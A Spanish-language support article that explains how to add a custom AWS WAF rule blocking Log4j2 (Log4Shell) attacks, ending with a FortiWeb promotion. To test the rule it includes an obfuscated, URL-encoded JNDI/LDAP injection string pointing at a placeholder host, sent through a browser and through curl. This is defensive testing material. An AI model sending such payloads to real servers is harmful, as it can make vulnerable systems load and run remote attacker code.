| Descripción: | Este artículo describe cómo crear manualmente una firma personalizada en AWS WAF para bloquear ataques en servidores web alojados en AWS y utilizando la biblioteca Log4j2. Esto debe agregarse encima de las reglas administradas de Fortinet. |
| Alcance | |
| Solución | Siga los pasos a continuación para configurar manualmente una nueva regla de seguridad en AWS WAF:
1. Asegúrese de que las reglas de Fortinet ya estén vigentes. Las siguientes capturas de pantalla muestran las reglas en AWS WAF v1 y v2 respectivamente. Se sugiere usar v2 ya que brinda una protección más poderosa. AWSWAF v1 AWSWAF v2
2. Ahora vaya a la columna Reglas de su ACL web para agregar una nueva regla
3. En Rule Builder , ingrese un nombre para la regla, luego seleccione Regla regular .
4. Desplácese hacia abajo y establezca sus declaraciones como se muestra en la captura de pantalla. Nota: No incluiremos la expresión regular en este artículo porque no debe exponerse públicamente por motivos de seguridad. Póngase en contacto con el equipo de soporte de Fortinet para obtenerlo. Debido a que AWS WAF no admite todos los tipos de inspección de encabezados automáticamente, debe agregar los encabezados uno por uno con el mismo patrón de expresiones regulares. Se recomienda agregar al menos los encabezados comunes como Cookie, Referer, etc. Cuanto más, mejor.
5. Después de configurar la regla, pruébela de la siguiente manera: una. Use su navegador para acceder a la dirección como, http://your-domain/?24%7B%24%7Benv%3Afoo%3A-jndi%7D%3Aldap%3A%2F%2Ftest.example.com%2Fexp .
Volverá una página de error 403 si funciona.
b. Utilice la herramienta de línea de comandos curl para ejecutar: $rizo ‘ http://su-dominio/?%24%7B%24%7Benv%3Afoo%3A-jndi%7D%3Aldap%3A%2F%2Ftest.example.com%2Fexp’ El siguiente resultado debería imprimirse si funciona
A medida que continúan surgiendo variantes, incluso si las reglas de seguridad están configuradas en AWS WAF, se debe considerar una solución más sólida. La solución WAF basada en SaaS de FortiWeb es un buen complemento. Protege las aplicaciones web alojadas en la nube pública del OWASP Top 10, las amenazas de día cero y otros ataques a la capa de aplicación. Suscríbase aquí: https://aws.amazon.com/marketplace/pp/prodview-rbkvcwsvcpgsk |
¿Te ha resultado útil??
0 / 0
Hola, somos Mila Jiménez y César Sánchez. Dos apasionados de la ciberseguridad con muchos años de experiencia. Hemos trabajado en muchas empresas del mundo TI y ahora nos apetece compartir nuestro conocimiento con cualquiera que lo necesite.
¡Si te gusta nuestro contenido puedes invitarnos a un café AQUÍ!